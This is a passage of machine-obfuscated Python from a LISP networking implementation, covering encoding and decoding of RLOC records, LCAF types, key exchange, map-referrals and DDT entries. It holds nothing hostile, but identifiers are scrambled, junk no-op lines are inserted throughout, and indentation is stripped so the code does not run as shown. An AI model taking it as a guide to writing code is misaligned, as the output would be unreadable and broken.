if 46 - 46: iIii1I11I1II1 . Ii1I % Ii1I - I1IiiI
iiII1IIIi = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
iiII1IIIi = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 45 - 45: Ii1I . OoO0O00 - OoO0O00 . OoO0O00 - iIii1I11I1II1
if 41 - 41: OoO0O00 * i11iIiiIii / i1IIi + o0oOOo0O0Ooo . IiII
iii111iIiiIII = ""
if ( self . rloc_name ) :
iii111iIiiIII += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
iii111iIiiIII += self . rloc_name + "\0"
if 21 - 21: OOooOOo / O0
if 46 - 46: OoooooooOO % Oo0Ooo % i1IIi / ooOoO0o - I11i
IiiiI = len ( IiIoOo0ooo ) + len ( Ii1111i ) + len ( oo0oO0 ) + len ( iiII1IIIi ) + 2 + len ( oOoooo0 ) + self . rloc . addr_length ( ) + len ( iii111iIiiIII )
if 57 - 57: I1Ii111 * I1ii11iIi11i / i1IIi % i11iIiiIii
IiiiI = socket . htons ( IiiiI )
oOOo00Oo0 = struct . pack ( "HBBBBHH" , OoOoO00OoOOo , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , IiiiI , socket . htons ( self . rloc . afi ) )
oOOo00Oo0 += self . rloc . pack_address ( )
return ( oOOo00Oo0 + iii111iIiiIII + IiIoOo0ooo + Ii1111i + oo0oO0 + iiII1IIIi + oOoooo0 )
if 78 - 78: iIii1I11I1II1 * OoOoOO00 - I1IiiI . O0 / I1Ii111
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
def encode ( self ) :
II111Ii1I1I = 0
if ( self . local_bit ) : II111Ii1I1I |= 0x0004
if ( self . probe_bit ) : II111Ii1I1I |= 0x0002
if ( self . reach_bit ) : II111Ii1I1I |= 0x0001
if 54 - 54: ooOoO0o - O0 + iII111i
IiiiIi1iiii11 = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( II111Ii1I1I ) ,
socket . htons ( self . rloc . afi ) )
if 34 - 34: Ii1I - OOooOOo % iII111i
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 48 - 48: oO0o - O0
IiiiIi1iiii11 = IiiiIi1iiii11 [ 0 : - 2 ] + self . encode_lcaf ( )
else :
IiiiIi1iiii11 += self . rloc . pack_address ( )
if 17 - 17: iIii1I11I1II1 . IiII / ooOoO0o % I11i + o0oOOo0O0Ooo - iIii1I11I1II1
return ( IiiiIi1iiii11 )
if 95 - 95: OoOoOO00 + OOooOOo - I11i * i1IIi + i1IIi * O0
if 60 - 60: Oo0Ooo + I11i % iIii1I11I1II1 % oO0o - I1Ii111 / o0oOOo0O0Ooo
def decode_lcaf ( self , packet , nonce , ms_json_encrypt ) :
i1I1iii1I11II = "HBBBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 9 - 9: IiII / oO0o % O0 * I1Ii111 - iIii1I11I1II1 % i1IIi
O0ooo0 , Ii1IiIIIi1i , II111Ii1I1I , iI1IIiI111iII , o00oo0oOo0o0 , oOOO0O000Oo = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 83 - 83: OoOoOO00 + OOooOOo / OoooooooOO
if 39 - 39: OoO0O00 % iII111i . oO0o . II111iiii - i11iIiiIii
oOOO0O000Oo = socket . ntohs ( oOOO0O000Oo )
packet = packet [ Iiiii : : ]
if ( oOOO0O000Oo > len ( packet ) ) : return ( None )
if 85 - 85: O0 - OoOoOO00
if 17 - 17: o0oOOo0O0Ooo / i1IIi / OOooOOo
if 91 - 91: I1ii11iIi11i / Ii1I - OoOoOO00 . I11i / oO0o
if 16 - 16: IiII % iII111i . oO0o . I1IiiI % O0 * I11i
if ( iI1IIiI111iII == LISP_LCAF_AFI_LIST_TYPE ) :
while ( oOOO0O000Oo > 0 ) :
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( oOOO0O000Oo < Iiiii ) : return ( None )
if 99 - 99: OoOoOO00 / OoooooooOO + iII111i * I11i * i11iIiiIii + OOooOOo
iIi1Iii1 = len ( packet )
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
O0ooo0 = socket . ntohs ( O0ooo0 )
if 40 - 40: II111iiii / I11i % I1IiiI - O0
if ( O0ooo0 == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
if ( packet == None ) : return ( None )
else :
packet = packet [ Iiiii : : ]
self . rloc_name = None
if ( O0ooo0 == LISP_AFI_NAME ) :
packet , oo0O0OOooO0 = lisp_decode_dist_name ( packet )
self . rloc_name = oo0O0OOooO0
else :
self . rloc . afi = O0ooo0
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 39 - 39: i11iIiiIii - OoOoOO00 % OOooOOo + ooOoO0o + i11iIiiIii
if 59 - 59: IiII / OoOoOO00 - I1Ii111 - ooOoO0o . oO0o
if 87 - 87: oO0o + I1IiiI * I1Ii111 * o0oOOo0O0Ooo + O0
oOOO0O000Oo -= iIi1Iii1 - len ( packet )
if 21 - 21: I1Ii111 + OoOoOO00 + OoOoOO00 . II111iiii / I1Ii111 . I1IiiI
if 66 - 66: I1Ii111 % oO0o . iII111i * i1IIi
elif ( iI1IIiI111iII == LISP_LCAF_GEO_COORD_TYPE ) :
if 81 - 81: OoooooooOO * I1IiiI / I1Ii111
if 10 - 10: I1IiiI - II111iiii / IiII * II111iiii
if 67 - 67: II111iiii . Ii1I % oO0o . Oo0Ooo + IiII
if 10 - 10: OOooOOo - OoO0O00 * oO0o / iIii1I11I1II1 - OoOoOO00
I1Ii1i111I = lisp_geo ( "" )
packet = I1Ii1i111I . decode_geo ( packet , oOOO0O000Oo , o00oo0oOo0o0 )
if ( packet == None ) : return ( None )
self . geo = I1Ii1i111I
if 51 - 51: O0 + Ii1I * OoooooooOO . oO0o + OoooooooOO
elif ( iI1IIiI111iII == LISP_LCAF_JSON_TYPE ) :
O0iI1Iii = o00oo0oOo0o0 & 0x02
if 35 - 35: I1ii11iIi11i + O0
if 7 - 7: OoooooooOO % iII111i % Ii1I % II111iiii / oO0o
if 15 - 15: OoO0O00
if 18 - 18: OoooooooOO / OOooOOo % i1IIi - i1IIi / Oo0Ooo
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( oOOO0O000Oo < Iiiii ) : return ( None )
if 94 - 94: I1Ii111 + i11iIiiIii / iII111i + OoooooooOO % i1IIi
iiiii1I = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
iiiii1I = socket . ntohs ( iiiii1I )
if ( oOOO0O000Oo < Iiiii + iiiii1I ) : return ( None )
if 57 - 57: iIii1I11I1II1 - i11iIiiIii / II111iiii
packet = packet [ Iiiii : : ]
self . json = lisp_json ( "" , packet [ 0 : iiiii1I ] , O0iI1Iii ,
ms_json_encrypt )
packet = packet [ iiiii1I : : ]
if 35 - 35: I1IiiI - IiII * I1Ii111 - ooOoO0o % oO0o
if 88 - 88: IiII * OoO0O00 / IiII * I1IiiI + O0 / IiII
if 41 - 41: OoOoOO00
if 81 - 81: Ii1I . I1IiiI % o0oOOo0O0Ooo . OoOoOO00
O0ooo0 = socket . ntohs ( struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ] )
packet = packet [ 2 : : ]
if 94 - 94: oO0o % Oo0Ooo + OoO0O00 * oO0o - i11iIiiIii / I11i
if ( O0ooo0 != 0 and lisp_is_json_telemetry ( self . json . json_string ) ) :
self . rloc . afi = O0ooo0
packet = self . rloc . unpack_address ( packet )
if 46 - 46: IiII - OoO0O00 * iII111i . I1Ii111 - ooOoO0o . i1IIi
if 53 - 53: I1Ii111 * I1IiiI + Oo0Ooo + I1IiiI + OOooOOo
elif ( iI1IIiI111iII == LISP_LCAF_ELP_TYPE ) :
if 8 - 8: i11iIiiIii + OoOoOO00 . I1ii11iIi11i / OoooooooOO % II111iiii
if 21 - 21: oO0o - o0oOOo0O0Ooo + ooOoO0o . I1IiiI * oO0o * Ii1I
if 41 - 41: i1IIi % i11iIiiIii + I11i % OoooooooOO / I1ii11iIi11i
if 8 - 8: OoooooooOO - OoO0O00 / i11iIiiIii / O0 . IiII
O0OoO0O0O0oO = lisp_elp ( None )
O0OoO0O0O0oO . elp_nodes = [ ]
while ( oOOO0O000Oo > 0 ) :
II111Ii1I1I , O0ooo0 = struct . unpack ( "HH" , packet [ : 4 ] )
if 58 - 58: I1ii11iIi11i + Oo0Ooo . Oo0Ooo / iII111i . i11iIiiIii
O0ooo0 = socket . ntohs ( O0ooo0 )
if ( O0ooo0 == LISP_AFI_LCAF ) : return ( None )
if 8 - 8: I1ii11iIi11i + O0 - oO0o % II111iiii . I1Ii111
IIii = lisp_elp_node ( )
O0OoO0O0O0oO . elp_nodes . append ( IIii )
if 86 - 86: IiII
II111Ii1I1I = socket . ntohs ( II111Ii1I1I )
IIii . eid = ( II111Ii1I1I & 0x4 )
IIii . probe = ( II111Ii1I1I & 0x2 )
IIii . strict = ( II111Ii1I1I & 0x1 )
IIii . address . afi = O0ooo0
IIii . address . mask_len = IIii . address . host_mask_len ( )
packet = IIii . address . unpack_address ( packet [ 4 : : ] )
oOOO0O000Oo -= IIii . address . addr_length ( ) + 4
if 71 - 71: Ii1I - i1IIi . I1IiiI
O0OoO0O0O0oO . select_elp_node ( )
self . elp = O0OoO0O0O0oO
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
elif ( iI1IIiI111iII == LISP_LCAF_RLE_TYPE ) :
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
iI1Ii11 = lisp_rle ( None )
iI1Ii11 . rle_nodes = [ ]
while ( oOOO0O000Oo > 0 ) :
O0O , IIIi1i1iIIIi , oOOoOoooOo0o , O0ooo0 = struct . unpack ( "HBBH" , packet [ : 6 ] )
if 59 - 59: i11iIiiIii - I11i * Oo0Ooo % o0oOOo0O0Ooo + i1IIi
O0ooo0 = socket . ntohs ( O0ooo0 )
if ( O0ooo0 == LISP_AFI_LCAF ) : return ( None )
if 30 - 30: ooOoO0o / iII111i
Iii = lisp_rle_node ( )
iI1Ii11 . rle_nodes . append ( Iii )
if 66 - 66: ooOoO0o / IiII * iIii1I11I1II1
Iii . level = oOOoOoooOo0o
Iii . address . afi = O0ooo0
Iii . address . mask_len = Iii . address . host_mask_len ( )
packet = Iii . address . unpack_address ( packet [ 6 : : ] )
if 42 - 42: I1Ii111 - i11iIiiIii % II111iiii * ooOoO0o . O0 % I11i
oOOO0O000Oo -= Iii . address . addr_length ( ) + 6
if ( oOOO0O000Oo >= 2 ) :
O0ooo0 = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( O0ooo0 ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , Iii . rloc_name = lisp_decode_dist_name ( packet )
if 82 - 82: Oo0Ooo % O0 + I1ii11iIi11i % I1ii11iIi11i
if ( packet == None ) : return ( None )
oOOO0O000Oo -= len ( Iii . rloc_name ) + 1 + 2
if 74 - 74: O0 * IiII . I11i - I1Ii111 + O0 + I11i
if 48 - 48: oO0o . o0oOOo0O0Ooo - OOooOOo
if 29 - 29: Oo0Ooo - Ii1I - Oo0Ooo
self . rle = iI1Ii11
self . rle . build_forwarding_list ( )
if 89 - 89: Oo0Ooo . OoO0O00 . I1ii11iIi11i * oO0o . O0
elif ( iI1IIiI111iII == LISP_LCAF_SECURITY_TYPE ) :
if 72 - 72: i11iIiiIii % I11i / I1Ii111 + I1IiiI * iII111i
if 69 - 69: I1Ii111 + O0 . IiII . o0oOOo0O0Ooo
if 38 - 38: IiII / i1IIi
if 60 - 60: OoOoOO00
if 75 - 75: II111iiii / iIii1I11I1II1 / OoooooooOO
OoO = packet
iI1IiI1 = lisp_keys ( 1 )
packet = iI1IiI1 . decode_lcaf ( OoO , oOOO0O000Oo , False )
if ( packet == None ) : return ( None )
if 61 - 61: IiII . IiII
if 17 - 17: OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
if 95 - 95: iII111i / ooOoO0o + I1Ii111
iI111I = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( iI1IiI1 . cipher_suite in iI111I ) :
if ( iI1IiI1 . cipher_suite == LISP_CS_25519_CBC ) :
Oo000O000 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
if ( iI1IiI1 . cipher_suite == LISP_CS_25519_CHACHA ) :
Oo000O000 = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 81 - 81: I1ii11iIi11i
else :
Oo000O000 = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
packet = Oo000O000 . decode_lcaf ( OoO , oOOO0O000Oo , False )
if ( packet == None ) : return ( None )
if 76 - 76: I1Ii111 - O0
if ( len ( packet ) < 2 ) : return ( None )
O0ooo0 = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( O0ooo0 )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 23 - 23: O0 * Ii1I * ooOoO0o % ooOoO0o
if 7 - 7: II111iiii + I11i
if 99 - 99: iIii1I11I1II1 * oO0o
if 37 - 37: ooOoO0o * iII111i * I11i
if 11 - 11: I1IiiI
if 48 - 48: O0 . I11i
if ( self . rloc . is_null ( ) ) : return ( packet )
if 9 - 9: oO0o / Oo0Ooo
Ooooo = self . rloc_name
if ( Ooooo ) : Ooooo = blue ( self . rloc_name , False )
if 45 - 45: I11i
if 90 - 90: OoO0O00 * I1IiiI - I1IiiI % OoO0O00
if 84 - 84: I1IiiI % I1IiiI * Ii1I
if 75 - 75: iIii1I11I1II1 - I1Ii111
if 86 - 86: O0 + O0 / I11i - iIii1I11I1II1
if 42 - 42: OOooOOo
oO0OooO0o0 = self . keys [ 1 ] if self . keys else None
if ( oO0OooO0o0 == None ) :
if ( Oo000O000 . remote_public_key == None ) :
Iii11I111Ii11 = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( Iii11I111Ii11 , Ooooo ) )
Oo000O000 = None
else :
Iii11I111Ii11 = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( Iii11I111Ii11 , Ooooo ) )
Oo000O000 . compute_shared_key ( "encap" )
if 39 - 39: O0 % Ii1I . I11i * o0oOOo0O0Ooo
if 14 - 14: I11i . iIii1I11I1II1 + I1Ii111 % OoooooooOO
if 9 - 9: oO0o + Ii1I / I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo
if 64 - 64: I11i % i11iIiiIii % I1ii11iIi11i
if 14 - 14: I1Ii111 - OoOoOO00 - I1ii11iIi11i % I11i + OoooooooOO
if 4 - 4: I1Ii111 - I1IiiI / iIii1I11I1II1 + I1ii11iIi11i % iIii1I11I1II1 * I1IiiI
if 30 - 30: i11iIiiIii % OOooOOo
if 52 - 52: I11i - oO0o . i11iIiiIii - II111iiii + Ii1I . iII111i
if 27 - 27: I1IiiI + OoOoOO00 + iII111i
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if ( oO0OooO0o0 ) :
if ( Oo000O000 . remote_public_key == None ) :
Oo000O000 = None
OOO0o0oo = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( OOO0o0oo , Ooooo ) )
elif ( oO0OooO0o0 . compare_keys ( Oo000O000 ) ) :
Oo000O000 = oO0OooO0o0
lprint ( " Maintain stored encap-keys for {}" . format ( Ooooo ) )
if 34 - 34: i1IIi % Oo0Ooo . oO0o
else :
if ( oO0OooO0o0 . remote_public_key == None ) :
Iii11I111Ii11 = "New encap-keying for existing state"
else :
Iii11I111Ii11 = "Remote encap-rekeying"
if 36 - 36: I1ii11iIi11i / I1Ii111 - IiII + OOooOOo + I1Ii111
lprint ( " {} for {}" . format ( bold ( Iii11I111Ii11 , False ) ,
Ooooo ) )
oO0OooO0o0 . remote_public_key = Oo000O000 . remote_public_key
oO0OooO0o0 . compute_shared_key ( "encap" )
Oo000O000 = oO0OooO0o0
if 62 - 62: Oo0Ooo . OoO0O00 * I1Ii111 . i11iIiiIii * O0
if 10 - 10: Oo0Ooo / OoOoOO00 * OOooOOo - IiII + Ii1I
self . keys = [ None , Oo000O000 , None , None ]
if 62 - 62: I1IiiI . Ii1I
else :
if 74 - 74: Ii1I - I11i % ooOoO0o - I1IiiI - Ii1I - II111iiii
if 81 - 81: i1IIi * I1ii11iIi11i + IiII - OoO0O00 * i1IIi
if 6 - 6: iIii1I11I1II1 % OoOoOO00 % II111iiii % o0oOOo0O0Ooo
if 52 - 52: Ii1I - I1IiiI * iIii1I11I1II1 % Oo0Ooo * OOooOOo
packet = packet [ oOOO0O000Oo : : ]
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
return ( packet )
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
def decode ( self , packet , nonce , ms_json_encrypt = False ) :
i1I1iii1I11II = "BBBBHH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 40 - 40: OoOoOO00 - II111iiii
self . priority , self . weight , self . mpriority , self . mweight , II111Ii1I1I , O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 29 - 29: I1IiiI - O0
if 36 - 36: I1IiiI * I1IiiI
II111Ii1I1I = socket . ntohs ( II111Ii1I1I )
O0ooo0 = socket . ntohs ( O0ooo0 )
self . local_bit = True if ( II111Ii1I1I & 0x0004 ) else False
self . probe_bit = True if ( II111Ii1I1I & 0x0002 ) else False
self . reach_bit = True if ( II111Ii1I1I & 0x0001 ) else False
if 79 - 79: I1Ii111 - I11i
if ( O0ooo0 == LISP_AFI_LCAF ) :
packet = packet [ Iiiii - 2 : : ]
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
else :
self . rloc . afi = O0ooo0
packet = packet [ Iiiii : : ]
packet = self . rloc . unpack_address ( packet )
if 49 - 49: II111iiii + O0 * ooOoO0o - Oo0Ooo
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 89 - 89: I1IiiI + I11i . oO0o . II111iiii + oO0o / Oo0Ooo
if 32 - 32: OoO0O00 % oO0o * I1ii11iIi11i + I11i / I1Ii111
def end_of_rlocs ( self , packet , rloc_count ) :
for IiIIi1IiiIiI in range ( rloc_count ) :
packet = self . decode ( packet , None , False )
if ( packet == None ) : return ( None )
if 5 - 5: o0oOOo0O0Ooo + iII111i / OoooooooOO + Ii1I . OoOoOO00 / oO0o
return ( packet )
if 18 - 18: II111iiii . o0oOOo0O0Ooo
if 75 - 75: OoooooooOO - Oo0Ooo
if 56 - 56: II111iiii - i11iIiiIii - oO0o . o0oOOo0O0Ooo
if 4 - 4: i1IIi
if 91 - 91: IiII . OoO0O00 * Ii1I / o0oOOo0O0Ooo
if 41 - 41: I1IiiI . OoO0O00 / i1IIi . Oo0Ooo . oO0o
if 44 - 44: iII111i * I11i + i11iIiiIii + i1IIi / IiII * II111iiii
if 58 - 58: OOooOOo
if 72 - 72: OoO0O00 + OOooOOo - Oo0Ooo % ooOoO0o . IiII
if 95 - 95: iII111i % OOooOOo - IiII - OoOoOO00 % o0oOOo0O0Ooo * O0
if 16 - 16: I1Ii111 / Oo0Ooo
if 48 - 48: Oo0Ooo / oO0o + iII111i % iII111i
if 9 - 9: I1ii11iIi11i - o0oOOo0O0Ooo . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 30 - 30: OoooooooOO - iIii1I11I1II1 / oO0o * Ii1I / Ii1I
if 52 - 52: OoOoOO00 - OoO0O00 + I1IiiI + IiII
if 49 - 49: oO0o / I11i - oO0o
if 31 - 31: OoOoOO00 + I1IiiI + I1ii11iIi11i + I11i * II111iiii % oO0o
if 90 - 90: OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
class lisp_map_referral ( ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
# OOooOOo + o0oOOo0O0Ooo + OoOoOO00 + iIii1I11I1II1 + II111iiii - O0
lisp_hex_string ( self . nonce ) ) )
if 22 - 22: Ii1I % O0 - oO0o / I1IiiI * OoOoOO00
if 31 - 31: IiII + I1IiiI * I11i % OoO0O00
def encode ( self ) :
iII = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( iII ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
return ( IiiiIi1iiii11 )
if 77 - 77: II111iiii * OoooooooOO * ooOoO0o % OOooOOo % OOooOOo * i1IIi
if 37 - 37: I1ii11iIi11i * iII111i . ooOoO0o - I1IiiI
def decode ( self , packet ) :
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 95 - 95: I11i / I1Ii111 % Ii1I % o0oOOo0O0Ooo . Ii1I
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
iII = socket . ntohl ( iII [ 0 ] )
self . record_count = iII & 0xff
packet = packet [ Iiiii : : ]
if 40 - 40: iII111i . ooOoO0o % OoooooooOO % OOooOOo / OoooooooOO / Oo0Ooo
i1I1iii1I11II = "Q"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 93 - 93: o0oOOo0O0Ooo % iIii1I11I1II1 % oO0o / I1IiiI
self . nonce = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
return ( packet )
if 98 - 98: II111iiii + Oo0Ooo - i1IIi + iII111i + II111iiii
if 93 - 93: O0
if 78 - 78: I1Ii111 * i1IIi + OoooooooOO * ooOoO0o
if 69 - 69: i1IIi
if 83 - 83: I1ii11iIi11i . ooOoO0o + I1IiiI + O0
if 78 - 78: O0 + Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
class lisp_ddt_entry ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
if 50 - 50: o0oOOo0O0Ooo
if 85 - 85: II111iiii . iII111i - i1IIi
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
I1IooOoo00 = self . delegation_set [ 0 ]
return ( I1IooOoo00 . print_node_type ( ) )
if 24 - 24: I1Ii111 + I1ii11iIi11i % I11i * oO0o % i1IIi
if 14 - 14: I11i * OOooOOo - O0 . I1ii11iIi11i * O0
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 40 - 40: OoOoOO00 - II111iiii . I1IiiI . i1IIi
if 60 - 60: iIii1I11I1II1 + ooOoO0o * i11iIiiIii + OoooooooOO
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
IIIIii11i1I = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( IIIIii11i1I == None ) :
IIIIii11i1I = lisp_ddt_entry ( )
IIIIii11i1I . eid . copy_address ( self . group )
IIIIii11i1I . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , IIIIii11i1I )
if 24 - 24: OOooOOo / O0 - OoO0O00 + IiII
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( IIIIii11i1I . group )
IIIIii11i1I . add_source_entry ( self )
if 33 - 33: I1IiiI
if 92 - 92: OOooOOo / i11iIiiIii + OoooooooOO
if 9 - 9: iII111i
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
if 9 - 9: O0 / o0oOOo0O0Ooo / I11i - i11iIiiIii - iII111i / IiII
if 46 - 46: IiII + OoooooooOO % I1IiiI
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 51 - 51: I1IiiI * I1Ii111 . i11iIiiIii % Oo0Ooo . i1IIi - oO0o
if 56 - 56: Oo0Ooo / II111iiii
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 76 - 76: OoOoOO00 % OoO0O00 * O0
if 39 - 39: ooOoO0o / iII111i
if 94 - 94: oO0o + iII111i * OoOoOO00 - i1IIi / OoooooooOO
class lisp_ddt_node ( ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
if 59 - 59: I11i % Ii1I / OoOoOO00
if 99 - 99: Ii1I + II111iiii / i11iIiiIii - IiII / iII111i + iII111i
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
if 55 - 55: IiII + OoooooooOO * I1ii11iIi11i . IiII * I1ii11iIi11i + IiII
if 81 - 81: iIii1I11I1II1 . ooOoO0o + OoOoOO00
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
if 31 - 31: I11i / OoOoOO00 + o0oOOo0O0Ooo
if 80 - 80: Oo0Ooo
def is_ms_child ( self ) :
return ( self . map_server_child )
if 58 - 58: I1Ii111 + OOooOOo
if 76 - 76: II111iiii - o0oOOo0O0Ooo % OoO0O00 + iII111i
def is_ms_peer ( self ) :
return ( self . map_server_peer )
if 38 - 38: I1Ii111 - I11i * i1IIi + iIii1I11I1II1
if 41 - 41: Ii1I . OoO0O00 + I1ii11iIi11i + OoOoOO00
if 76 - 76: iII111i - iIii1I11I1II1
if 23 - 23: I11i / OoO0O00 % OOooOOo
if 9 - 9: ooOoO0o % I1ii11iIi11i . OoooooooOO + OoO0O00 % OOooOOo * OoooooooOO
if 21 - 21: Ii1I % O0
if 15 - 15: II111iiii * Ii1I + IiII % iII111i
class lisp_ddt_map_request ( ) :
def __init__ ( self , lisp_sockets , packet , eid , group , nonce ) :
self . uptime = lisp_get_timestamp ( )
self . lisp_sockets = lisp_sockets
self . packet = packet
self . eid = eid
self . group = group
self . nonce = nonce
self . mr_source = None
self . sport = 0
self . itr = None
self . retry_count = 0
self . send_count = 0
self . retransmit_timer = None
self . last_request_sent_to = None
self . from_pitr = False
self . tried_root = False
self . last_cached_prefix = [ None , None ]
if 96 - 96: II111iiii * I1Ii111 / Oo0Ooo
if 35 - 35: I1IiiI
def print_ddt_map_request ( self ) :
lprint ( "Queued Map-Request from {}ITR {}->{}, nonce 0x{}" . format ( "P" if self . from_pitr else "" ,
# Ii1I + O0 - i1IIi - I11i
red ( self . itr . print_address ( ) , False ) ,
